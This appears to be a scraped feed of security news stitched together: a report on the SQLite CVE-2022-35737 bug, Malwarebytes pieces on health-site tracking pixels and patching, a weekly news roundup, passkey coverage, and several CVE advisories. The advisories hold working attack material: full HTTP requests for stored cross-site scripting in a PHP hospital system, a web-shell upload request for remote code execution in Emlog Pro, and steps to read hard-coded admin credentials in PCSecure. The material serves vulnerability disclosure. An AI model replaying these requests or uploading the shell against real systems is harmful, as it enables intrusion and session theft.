A high-severity vulnerability has been disclosed in the SQLite database library, which was introduced as part of a code change dating all the way back to October 2000 and could enable attackers to crash or control programs.
Tracked as CVE-2022-35737 (CVSS score: 7.5), the 22-year-old issue affects SQLite versions 1.0.12 through 3.39.1, and has been addressed in version 3.39.2 released on July 21

A high-severity vulnerability has been disclosed in the SQLite database library, which was introduced as part of a code change dating all the way back to October 2000 and could enable attackers to crash or control programs.

Tracked as CVE-2022-35737 (CVSS score: 7.5), the 22-year-old issue affects SQLite versions 1.0.12 through 3.39.1, and has been addressed in version 3.39.2 released on July 21, 2022.

"CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled," Trail of Bits researcher Andreas Kellas said in a technical write-up published today.

"Arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial-of-service is confirmed in all cases."

Programmed in C, SQLite is the most widely used database engine, included by default in Android, iOS, Windows, and macOS, as well as popular web browsers such as Google Chrome, Mozilla Firefox, and Apple Safari.

The vulnerability discovered by Trail of Bits concerns an integer overflow bug that occurs when extremely large string inputs are passed as parameters to the SQLite implementations of the printf functions, which, in turn, make use of another function to handle the string formatting ("sqlite3\_str\_vappendf").

However, a successful weaponization of the flaw banks on the prerequisite that the string contains the %Q, %q, or %w format substitution types, potentially leading to a program crash when user-controlled data is written beyond the bounds of a stack-allocated buffer.

"If the format string contains the '!' special character to enable unicode character scanning, then it is possible to achieve arbitrary code execution in the worst case, or to cause the program to hang and loop (nearly) indefinitely," Kellas explained.

The vulnerability is also an example of a scenario that was once deemed impractical decades ago -- allocating 1GB strings as input -- rendered feasible with the advent of 64-bit computing systems.

"It's a bug that may not have seemed like an error at the time that it was written (dating back to 2000 in the SQLite source code) when systems were primarily 32-bit architectures," Kellas said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

22-Year-Old Vulnerability Reported in Widely Used SQLite Database Library

Categories: News
Categories: Privacy
Tags: personal health information

Tags:  Advocate Aurora Health

Tags:  tracking pixels

Tags:  privacy

Tags:  browser guard

Advocate Aurora Health has disclosed that its websites may have shared visitor's identity and personal health information with Google and Meta.



(Read more...)




The post Healthcare site leaks personal health information via Google and Meta tracking pixels appeared first on Malwarebytes Labs.

Advocate Aurora Health has disclosed that by visiting its websites users may have shared personal information, and possibly protected health information (PHI), with Google and Meta (Facebook).

Advocate Aurora Health is the 11th largest not-for-profit, integrated health system in the US and provides care for about 3 million patients. The company used tracking technology provided by Google and Meta to understand how patients and others interact with its websites.

The questions Advocate Aurora Health wanted to answer were no different than any other website owner: How do visitors use its website, what draws them here, and which pages do they visit? That is very useful information if you want to optimize your website, attract more visitors, and build something that actually fits users needs.

And their solution was no different either: They turned to Google and Meta, who provide website owners with this information through the use of tracking "pixels". The code behind a tracking pixel can give a website owner useful information about their visitors, such as the type of device they are using, their approximation location (which can be worked out from a user's IP address), and how they move from page to page across a website. It can also reveal if visitors are coming from a paid ads on Google, Twitter, or Facebook, so companies can tell whether their marketing dollars are being spent productively.

**How data can be leaked**

What the Advocate Aurora Health's disclosure doesn't reveal is how the information was shared, or whether or not Google and Meta were aware of it. We note that the language it uses is "disclosed" rather than "gathered", suggesting the website over-shared rather than an overreach by the trackers.

Although both Google and Meta have, rightly, earned repuations for rapacious data gathering, the details of how their pixels work, and what they do and don't care about, are important where health information is concerned. It is possible that neither were aware of the nature of the data being shared, and that neither would want the legal or compliance headaches that come with handling it.

If that is the case, it wouldn't be the first time. Just two months ago North Carolina-based Novant Health notified 1.3 million patients that using the Meta pixel code may have led to unauthorized disclosure of PHI.

In 2015, when the Affordable Care act's healthcare.gov website first launched, it was also found to be leaking data to third parties, and it provides a useful lesson in how it can happen.

Simplistically, web analytics and web ad tracking systems want to know the number of indvidual visitors to the different URLs on a website, and how those visitors got there. Each time a visitor lands on a page a tracking pixel sends the URL (along with some extra information, such as the browser type, screen resolution, IP address etc) to Google, Meta, or whoever, so that they can add +1 to the count for that URL.

The healthcare.gov site used URL parameters to pass information from page to page as people moved through the site. The parameters included the user's age, zip code, income, and whether or not they were a smoker or pregnant. Since the URLs contained that information, and the URLs were sent to third party trackers to be counted, the third parties found themselves inadvertently receiving and storing privileged information.

Research done by TheMarkup in June of 2022 showed that Meta's pixel could be found on the websites of 33 of the top 100 hospitals in America.

**What was disclosed**

For Advocate Aurora Health customers, the following information may have been involved:

*   IP address
*   The dates, times, and/or locations of scheduled appointments
*   Their proximity to an Advocate Aurora Health location
*   Information about their provider
*   The type of appointment or procedure
*   First, last name, first name of a proxy, and medical record number
*   Information about whether they had insurance

According to Advocate Aurora Health, no social security number, financial account, credit card, or debit card information was involved in this incident.

**Stop tracking me**

Advocate Aurora Health disabled and/or removed tracking pixels on patient websites and applications. Luckily, not every website has to worry about that type of private information. Full disclosure, even this site uses tracking technology, but we do understand that you wish website owners didn’t.

There are several things you can do to stop this kind of tracking or limit the consequences.

*   Use a browser that values your privacy. Unfortunately there is a low correlation factor between what most people find the best browsers and what are the best browsers when it comes to privacy and security.
*   You can frustrate tracking by blocking and deleting cookies and making sure you log out of Facebook and Google before you visit other sites. However, this requires your full attention and in some of these cases you are relying on technology provided by Google and Facebook.
*   Anti-tracking software is your easy way out. We at Malwarebytes, recommend Malwarebytes Browser Guard. You can keep on using Chrome, Firefox, Edge, or Safari and after the install you can set and forget about trackers. Our  browser extension blocks tech support scams, hijackers, pop-up ads, trackers, and more to keep users secure and free from online harassment.

Healthcare site leaks personal health information via Google and Meta tracking pixels

Plus: A Microsoft cloud leak exposed potential customers, new IoT security labels come to the US, and details emerge about Trump’s document stash.

As Russia’s war in Ukraine drags on, Ukrainian forces have proved resilient and mounted increasingly intense counterattacks on Kremlin forces. But as the conflict evolves, it is entering an ominous phase of drone warfare. Russia has begun launching a series of recent attacks using Iranian “suicide drones” to inflict damage that is difficult to defend against. With Russian president Vladimir Putin escalating his rhetoric about the potential for a nuclear strike, and NATO officials watching closely for any signs of movement, we examine what indicators are available to the global community in assessing whether Russia is actually preparing to use nuclear weapons.

Meanwhile, an unrelenting string of deeply problematic vulnerabilities in Microsoft's Exchange Server on-premises email hosting service has left researchers to raise the alarm that the platform isn't getting the development resources it needs anymore, and customers should seriously consider migrating to cloud email hosting. And new research examines how Wikipedia's custodians ferret out state-sponsored disinformation campaigns in the crowdsourced encyclopedia's entries.

If you're worried about the ongoing threat of ransomware attacks around the world, researchers pointed out this week that middle-of-the-pack groups like the notorious gang Vice Society are maximizing profits and minimizing their exposure by investing very little in technical innovation. Instead, they simply run the most sparse and unremarkable operations they can to target under-funded sectors like health care and education. If you're looking to do something for your personal security, we've got a guide to ditching passwords and setting up “passkeys” on Android and Google Chrome.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

Officials in the United States have long warned of a potential national security threat because the wildly popular social video platform TikTok is owned by a Chinese company, ByteDance. But TikTok has always maintained that it is firewalled between ByteDance and its US userbase. But materials seen by _Forbes_ indicate that an internal ByteDance review board, the “Internal Audit and Risk Control department,” planned to direct TikTok to track the location of some specific US users. The group typically focuses on internal, employee issues, but the US-based individuals were reportedly not affiliated with TikTok or ByteDance. “In at least two cases, the Internal Audit team also planned to collect TikTok data about the location of a US citizen who had never had an employment relationship with the company, the materials show. It is unclear from the materials whether data about these Americans was actually collected,” _Forbes_ wrote.

Microsoft said this week that a misconfiguration exposed the data of some prospective customers of its cloud services. Researchers from the threat intelligence firm SOCRadar disclosed the leak to Microsoft on September 24, and the company quickly closed the exposure. SOCRadar said in a report that the exposed information stretched back to as far as 2017 and up to August of this year. The researchers linked the data to more than 65,000 organizations from 111 countries. Microsoft said the exposed details included names, company names, phone numbers, email addresses, email content, and files sent between potential customers and Microsoft or one of its authorized partners. Cloud misconfigurations are a longstanding security risk that have led to countless exposures and, sometimes, breaches.

There are no easy answers to improve the longstanding security dumpster fire created by cheap, undefended internet of things devices in homes and businesses around the world. But after years of problems, countries like Singapore and Germany have found that adding security labels to internet-connected video cameras, printers, toothbrushes, and more. The labels give consumers a better understanding of the protections built into different devices—and give manufacturers an incentive to improve their practices and get a gold seal. This week, the United States took a step in this direction. The White House announced plans for a labeling scheme that would be a sort of EnergyStar for IoT digital security. The administration held a summit with industry organizations and companies this week to discuss standards and guidelines for the labels. “A labeling program to secure such devices would provide American consumers with the peace of mind that the technology being brought into their homes is safe, and incentivize manufacturers to meet higher cybersecurity standards, and retailers to market secure devices,” National Security Council spokesperson Adrienne Watson said in a statement.

Sources told _The Washington Post_ this week that sensitive information related to Iran‘s nuclear program and the United States’ own intelligence operations in China were included in documents seized by the FBI this summer at former President Trump‘s Mar-a-Lago estate in Florida. “Unauthorized disclosures of specific information in the documents would pose multiple risks, experts say. People aiding US intelligence efforts could be endangered, and collection methods could be compromised,” the _Post_ wrote. The information could also potentially motivate retaliation by other countries against the US.

TikTok’s Security Threat Comes Into Focus

At the Authenticate Conference, Google and Microsoft demonstrated their passkey prototypes. Apple, meanwhile, already launched its version in iOS 16.

Apple, Google, and Microsoft are in the early stages of delivering on their plan to provide passkeys based on the FIDO Alliance's new passwordless authentication standard. But eliminating passwords won't happen overnight.

The three leading device and platform providers in May collectively announced they would incorporate the new passkeys into their respective platforms. Passkeys are based on the FIDO2 standard, which consists of World Wide Web Consortium's (W3C) Web Authentication (WebAuthn) specification and FIDO Alliance's Client-to-Authenticator Protocol (CTAP).

**Passkeys Start to Roll Out**

As expected, Apple became the first provider to provide passkeys with its iOS 16 release late last month, giving millions of iPhones and iPads the ability to use passkeys. Mac users will also be able to implement passkeys when Apple releases its newest operating system update, macOS Ventura, which is due to arrive this month. Last week Google released passkey betas for Android and Chrome.

Once a user sets up a passkey on one Apple device, it can synchronize with any other supported Apple client or service using iCloud Keychain. Also, when a user enrolls one device with a passkey, they can automatically enroll any other Apple device and service that supports them.

Google's passkey beta lets users create and use passkeys on their Android devices and securely sync them via Google Password Manager. Google software engineer Arnar Birgisson explained in a blog post that passkeys in Google Password Manager are always encrypted end to end.

"When a passkey is backed up, its private key is uploaded only in its encrypted form using an encryption key that is only accessible on the user's own devices," Birgisson noted. "This protects passkeys against Google itself, or e.g. a malicious attacker inside Google. Without access to the private key, such an attacker cannot use the passkey to sign-in to its corresponding online account."

**Demonstrating the Future**

Google and Microsoft demonstrated their implementations of passkeys to hundreds of identity and security experts at this week's Authenticate 2022 conference in Seattle. Google identity and security product manager Christiaan Brand demonstrated how to sign into an account with passkeys, which will appear in an Android update by December. Brand said anyone could sign up for the developer beta in the Google Play Services channel.

"The moment you sign up for this with a particular Google account, you will be able to get the latest updates on your device within a couple of minutes," Brand said. Passkeys for Chrome OS are on the road map for release next year, he added.

Brand and other identity and security experts at the conference emphasized that authenticating with passkeys is considerably more secure than passwords because they aren't vulnerable to phishing attacks or other compromises. Passkeys are also easier to use because they consist of cryptographic keys that can run on supported devices and cloud services.

Although Microsoft doesn't plan to offer passkeys in Windows until next year, the company demonstrated its implementation and shared various observations. For example, Microsoft would like to run passkeys alongside the company's Authenticator app, according to senior program manager for identity Scott Bingham.

"Passkeys are multidevice, FIDO credentials that are a really compelling solution," Bingham said. "It can be synced through a platform cloud and available to use on all your devices when you sign into the same platform account." 

While Windows Hello provides biometric authentication for unlocking a PC's OS screen, it will also enable the new passkeys.

**Integrating Online Services and Apps**

For passkeys to take off, websites and enterprises that use usernames and passwords for authentication must add support for passkeys. Thousands of organizations worldwide have deployed or are deploying FIDO authentication, enabling them to support passkeys, according to FIDO Alliance executive director Andrew Shikiar, in his opening remarks at the conference.

Among them is PayPal, which last year hired a founding member of the FIDO Alliance, Marcio Mello, as head of product for the PayPal Identity Platform. Mello said PayPal plans to offer support for passkeys in the US for a limited number of customers.

Using an iPhone with the new iOS 16, Mello demonstrated how to create a passkey with PayPal. He then explained that when using iCloud Keychain on a Mac with the updated OS, the passkey is available automatically. When using a device that doesn't yet support passkeys, if the user had already created one, they could access it by generating a QR code.

"This provides that amazing combination we've been waiting for, both convenience and security," Mello said. "Something that's absolutely required for us to be able to reach the large-scale consumer deployment that we'd be looking for worldwide."

While passwords remain the most common credentials for authentication, they are costly to organizations, according to the FIDO Alliance's Online Authentication Barometer, published this week. The study found that 59% of respondents give up accessing online accounts when they can't remember their password, and roughly 40% abandon purchases for the same reason. The survey also found that 39% are familiar with passkeys.

**Adoption Will Be Slow**

Throughout the conference, organized by the FIDO Alliance, there appeared to be widespread optimism among identity and security experts that the standardized cryptographic keys promise to pave the way to a future of passwordless authentication to devices, online services, and applications.

"Passkeys stand to take passwords out of play for hundreds of millions of consumers immediately," Shikiar said. How immediately passkeys replace passwords remains to be seen, but it will likely be years before they become mainstream, as some people signaled in their presentations.

The widespread adoption of passkeys is promising because users can reuse their credentials among different vendor ecosystems, says Gartner analyst Paul Rabinovich. Because passkeys registered on one device can complete authentication from another device, "we'll finally see wide adoption of software-based roaming authenticators" embedded as mobile apps or within operating systems, he says.

Passkey Demos Hint at What's Ahead for Passwordless Authentication

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

In the **add-patient.php** file, several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

      /\* ... \*/

if(isset($\_POST\['submit'\]))
{
    $docid=$\_SESSION\['id'\];
    $patname=$\_POST\['patname'\];
    $patcontact=$\_POST\['patcontact'\];
    $patemail=$\_POST\['patemail'\];
    $gender=$\_POST\['gender'\];
    $pataddress=$\_POST\['pataddress'\];
    $patage=$\_POST\['patage'\];
    $medhis=$\_POST\['medhis'\];
    $sql=mysqli\_query($con,"insert into tblpatient(Docid,PatientName,PatientContno,PatientEmail,PatientGender,PatientAdd,PatientAge,PatientMedhis)
values('$docid','$patname','$patcontact','$patemail','$gender','$pataddress','$patage','$medhis')");

      /\* ... \*/

In the **admin/manage-patients.php**, **doctor/manage-patient.php**, **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      /\* Example from doctor/view-patient.php\*/

$vid=$\_GET\['viewid'\];
$ret=mysqli\_query($con,"select \* from tblpatient where ID='$vid'");
$cnt=1;
while ($row=mysqli\_fetch\_array($ret)) {

    /\* ... \*/
    echo $row\['PatientName'\];
    /\* ... \*/
    echo $row\['PatientEmail'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientAdd'\];
    /\* ... \*/
    echo $row\['PatientGender'\];
    /\* ... \*/
    echo $row\['PatientMedhis'\];
    /\* ... \*/
    echo $row\['CreationDate'\];
    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **patname**, **patemail**, **gender**, **pataddress** and **medhis** POST parameters.  
The following is one of the possible exploitation using the **medhis POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: localhost
Content-Length: 180
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

patname=Name4&patcontact=3124432845&patemail=Name3%40mail.com&gender=male&pataddress=3021+Halsted+St%2C+Chicago&patage=40&medhis=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42205: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2 | Systems and Internet Security Lab

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

The files **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** share a common piece of code where several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

    /\* ... \*/

if(isset($\_POST\['submit'\]))
{

    $vid=$\_GET\['viewid'\];
    $bp=$\_POST\['bp'\];
    $bs=$\_POST\['bs'\];
    $weight=$\_POST\['weight'\];
    $temp=$\_POST\['temp'\];
    $pres=$\_POST\['pres'\];

    $query.=mysqli\_query($con,"insert tblmedicalhistory(PatientID,BloodPressure,BloodSugar,Weight,Temperature,MedicalPres) 
value('$vid','$bp','$bs','$weight','$temp','$pres')");

    
    /\* ... \*/

In the same files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      
    /\* ...\*/

while ($row=mysqli\_fetch\_array($ret)) { 

    echo $cnt;
    echo $row\['BloodPressure'\];
    echo $row\['Weight'\];
    echo $row\['BloodSugar'\];
    echo $row\['Temperature'\];
    echo $row\['MedicalPres'\];
    echo $row\['CreationDate'\];

    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **bp**, **bs**, **weight**, **temp** and **pres** POST parameters.  
The following is one of the possible exploitation using the **pres POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3 HTTP/1.1
Host: localhost
Content-Length: 94
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

bp=120%2F85&bs=12&weight=70kg&temp=36&pres=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42206: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3 | Systems and Internet Security Lab

Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.

    POST /emlog/admin/plugin.php?action=upload_zip HTTP/1.1
    Host: 192.168.111.155
    Content-Length: 876
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.111.155
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary804UeairFtrET9Lt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.111.155/emlog/admin/plugin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lq0s731hnlqm232itjlgpc27el; EM_AUTHCOOKIE_jT79impSwTWeimzUBIsgAmv1NoQbG2Zs=admin%7C1695536025%7C848fc865191736412177851eb6082b92; em_saveLastTime=1664436503884
    Connection: close
    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="pluzip"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���   � Mq=Ua郵/?    �  �   shell/shell.php=?K聾 嗺凔�78h嘍�2渹�v�裫]Dと??$W称��"XjQ皛Q礑??轌3?乿}哏}y��=觾@/@癴撰杻V+5倯x岹儊竲哷孁佸:�蚷?猏Z?,揱戏<氉�賬岈ノ�湞獈煶埑'R齿獙哮甙!?>靾?綱漜晅U?砭7it愴矐堬%{L�z�悏雀╊>��栮詔}岒O懘e隿�鍶趣?爱嘺ㄥ愭�
    AA噣霿扉┹Rq絓茇?cgf?PK���     Bq=U            �   shell/PK��? �   � Mq=Ua郵/?    �  � $               shell/shell.php
           � � F柑)视?F柑)视?�[秤?PK��? �     Bq=U            � $       �   *�  shell/
           � � 棦��视?�8?视?纳�爻迂�PK��    � � ?   N�    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="token"
    
    4e1bef9d513bae43a46448cbbaee0db7d1d5f7d1
    ------WebKitFormBoundary804UeairFtrET9Lt--
    
    

    http://192.168.111.155//emlog/content/plugins/shell/shell.php

CVE-2022-42189: cms_vul/emlog_pro_1.6.0_rce.md at main · wszdhf/cms_vul

Categories: Business
In this post, we cover the importance of third-party application patching and the challenges it can solve for your organization.



(Read more...)




The post Third-party application patching: Everything you need to know for your business appeared first on Malwarebytes Labs.

Patch management that is consistent and efficient has never been more critical in keeping your security infrastructure up to date and secure. Although today’s endpoint management solutions include patch management functionalities, third-party patching is an area that shouldn’t be forgotten.

In this post, we will cover the importance of third-party application patching and the challenges it can address for your organization.

**What is a third-party application?**

A third-party application is a type of software designed by an independent vendor other than the initial manufacturer of the device. Common examples of third-party app vendors, include Google Chrome, Adobe Acrobat Reader, TeamViewer, and others.

**What is third-party patching and why is it important?**

Third-party patching involves applying patch updates to third-party applications that have been installed on your business endpoints, which includes desktops, laptops, servers, and other devices. Third-party patch management patches vulnerabilities that, if exploited, can jeopardize the security and functionality of software. Vulnerabilities expose your company’s attack surfaces to malicious actors looking for opportunities to access your network.

So, why is patching third-party applications important to your business?

Patching software vulnerabilities is a key driver for preventing future cyberattacks on your organization. The vulnerabilities found in your business’s third-party apps opens the flood gates for hackers.

These malicious adversaries spread in your systems through techniques such as privilege escalation and lateral movement, seeking out sensitive information and valuable data. Patching third-party vulnerabilities reduces the likelihood of an attack while also fixing the bugs to improve software functionality. Another reason your organization should consider third-party patching is that it can help your business satisfy necessary compliance regulations.

**The risks to your business when neglecting to patch third-party applications**

In 2021, 93% of companies experienced a cybersecurity breach of some kind due to third-party vendors or supply chain weakness. With the average cost of a data breach in the US at an astounding $9.4 million, the repercussions of a cyber incident caused by unpatched vulnerabilities are detrimental. Consequentially, an attack of such magnitude causes disruption to daily workflows, productivity, and in cases causes reputational harm. Neglecting to patch third-party apps is a risk your company can’t afford.

When security teams choose not to consistently patch endpoints, your risk of exposure to potential cyberattacks increases. In 2021 for instance, Log4Shell, a software vulnerability in Apache Log4j 2, took the world by storm. For more information on Log4Shell, read the Malwarebytes blog post - What SMBs can do to protect against Log4Shell attacks.

What can businesses learn from vulnerabilities like Log4Shell? The third-party application patch management process is essential. Although third-party app vendors don’t strictly adhere to a patch release schedule, they normally do this when a vulnerability is discovered with a patch being released to address it. Read our article on Security vulnerabilities: 5 times businesses (and governments) got hacked for more information on how hackers exploited vulnerabilities like Log4Shell to attack organizations.

It’s challenging for organizations to keep up with all the software updates and available patches for third-party apps. More companies rely on third-party applications for their day-to-day business operations. Adhering to patch management best practices can help alleviate your security team’s load and enhance your organization’s cyber prevention.

**What is automated third-party patching?**

Automated patch management allows businesses to automatically scan endpoint devices for patches that are needed and automate the distribution of patches. In some situations, automated patching allows businesses to flexibly schedule patching deployments so that the third-party patching process doesn’t interrupt daily workflows. This automation eliminates the grunt work of manual patching where system admins would otherwise spend hours applying software patches themselves.

**What are the drawbacks of automated patch management software?**

Automated patch management can help minimize manual workloads and improve your company’s security posture. But it should be noted that automating the patch management process comes with increased operational risk depending on the situation.

Depending on the type of security infrastructure your organization has, implementing automated patch management software to a system that relies heavily on manual infrastructure deployment and managing may not be the best option. Security architecture that’s legacy-application heavy is not ideal for automated patch management. This is especially the case for integral applications - a minute of downtime causes dramatic organizational losses.

A common misconception is that automated third-party patching means your systems are more secure. While automatic patching helps your company maintain strong security posture, it is not a cure-all for security and is limited to its pre-programmed policies used to scan and identify missing patches. As more companies adopt cloud-native security infrastructure, the easier it will be to automate third-party patching.

**Third-party patch management vs vulnerability management – Let’s compare the two processes**

Third-party software patch management is centralized on grouping, prioritizing, and identifying missing patches in third-party applications. Patch management vendors created patch management solutions to tackle patches, but not all patches will resolve security flaws. For this reason, patch management products alone can’t effectively secure your organization.

Vulnerability management addresses your security risks by identifying security vulnerabilities in your systems. These vulnerabilities include a range of security issues where in some cases deploying a patch is not the solution to a particular vulnerability. Other vulnerabilities could involve security training for staff, configuring firewall policies, or making changes to your network.

**Third-party Patch Management and Compliance**

Timely and consistent third-party patching reinforces your cybersecurity prevention.

Third-party applications need to be continually updated to decrease your risk of infection. Leaving third-party apps unpatched or out of date can hinder your organization from achieving patch compliance requirements. Cybersecurity regulatory compliance such as PCI (Payment Card Industry Security Standards Council), GDPR (General Data Protection Regulation), and HIPAA (Health Insurance Portability and Accountability Act), all set standards for patch deployment and security patching protocols.

Interested in learning more about cyberattack prevention with vulnerability assessment and patch management tools? Visit our Vulnerability and Patch Management Modules and explore related content below.

Vulnerability response for SMBs: The Malwarebytes approach

**Listen to Lock and Code – Why software has so many vulnerabilities, with Tanya Janca****Malwarebytes’ modernized bug bounty program – here’s all you need to know****5 technologies that help prevent cyberattacks for SMBs****Request a demo of our Vulnerability Assessment and Patch Management module **

Third-party application patching: Everything you need to know for your business

In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access.

**PCSecure V5.0.8.xw - Use of Hard-coded Credentials in configuration files leads to admin panel access****Summary**

Vendor: PCTechSoft SAS

Product: PCSecure

Affected version(s): 5.0.8.xw

CodeName: PapiQuieroPollo00

**Vulnerability**

Type: Use of Hard-coded Credentials (CWE-798)

CVSSv3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSSv3.1 Base Score: 7.8 (High)

Exploit available: No

CVE ID: CVE-2022-42176

**Description**

The configuration file (system.bmp) in PCSecure V5.0.8.xw stores the credentials for access to admin panel in plain text, which allows a local user without privileges to login in as administrator and execute commands as windows local admin or reduce security control via reading the file from Chrome or Firefox.

**Proof of Concept****Demo**

**Steps to reproduce**

1.  Read the file system.bmp from Chrome using the following URI: "view-source:file:///C:/Archivos%20de%20programa/ARCHIVOS%20COMUNES/CONFIG/system.bmp"
    
2.  Identify the password for each user. The first line contains all the usernames separed by "\*", the second line contains the password for each username.
    
3.  Launch PCSecure admin panel. Press Ctrl + Mayus + P or Execute "C:\\archivos de programa\\personal\\pcsecure" or launch from windows Start menu.
    
4.  Login as Admin
    
5.  Change security profile and execute any command
    

**Tested on**

Windows 7

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Oreocato aka Miguel Chaparro Pedraza

**References**

Vendor page: https://www.pctechsoft.net

**Timeline**

2019-09-07: Vulnerability discovered.

2019-09-07: Vendor contacted.

2022-09-28: Public Disclosure.

2022-10-20: CVE ID assigned

CVE-2022-42176: CVE-Advisories/PapiQuieroPollo00 at main · soy-oreocato/CVE-Advisories

Chrome suffers from a heap use-after-free vulnerability in AccountSelectionBubbleView::OnAccountImageFetched.

Tag

#chrome